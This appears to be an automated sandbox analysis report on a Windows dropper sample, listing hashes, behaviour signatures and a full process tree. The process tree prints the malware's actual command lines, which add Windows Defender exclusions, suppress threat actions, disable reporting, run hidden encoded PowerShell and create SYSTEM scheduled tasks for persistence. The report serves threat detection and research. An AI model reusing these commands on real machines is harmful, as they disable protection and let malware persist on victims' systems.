Analysis
-
max time kernel
121s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
06-02-2023 14:48
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
25d73b42884ce7e961ecaa6218d693cf
-
SHA1
f9aa85a942f9412b75b0640aa43deffad9e271d7
-
SHA256
ea7f785317a5bcf4563463f220f6e9beef2b5bc30da8918e7f2b19a2f76b69b5
-
SHA512
2e81f3f15f06b3bafed1f36f5f64db9cf8ff22c135cc80603e691334465352e26d06bc6cf3600e2e239c8f4114f057509e3098621d1ea315ff040fcf370cda37
-
SSDEEP
196608:91OJ3V+ekPIbhbtWPu8u9fN83aGzTGBnb9dQH:3OJrhbs2ZCEBnbzc
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 27 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 44 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS9407.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS99F3.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "geNdJQzTF" /SC once /ST 12:57:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "geNdJQzTF"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geNdJQzTF"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "boytPmuAkKgmiEZYSe" /SC once /ST 15:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\nDhcZAs.exe\" X6 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\nDhcZAs.exeC:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\nDhcZAs.exe X6 /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OKneYAAzclQU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OKneYAAzclQU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eCbNXTSQanJlC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eCbNXTSQanJlC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vcfECUarZbUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vcfECUarZbUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wRLQelouU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wRLQelouU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WoychCUlhHkYXpVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WoychCUlhHkYXpVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UIFvrSrxAzeYKEuX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UIFvrSrxAzeYKEuX\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WoychCUlhHkYXpVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WoychCUlhHkYXpVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UIFvrSrxAzeYKEuX /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UIFvrSrxAzeYKEuX /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnwuBUmOp" /SC once /ST 14:42:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnwuBUmOp"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnwuBUmOp"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tRsUEOedRvIwZoOQu" /SC once /ST 14:17:03 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\aDhLZTd.exe\" nL /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "tRsUEOedRvIwZoOQu"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\aDhLZTd.exeC:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\aDhLZTd.exe nL /site_id 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "boytPmuAkKgmiEZYSe"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wRLQelouU\BVgZEy.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xhAFLspUEGhlntx" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xhAFLspUEGhlntx2" /F /xml "C:\Program Files (x86)\wRLQelouU\DpPfrOh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
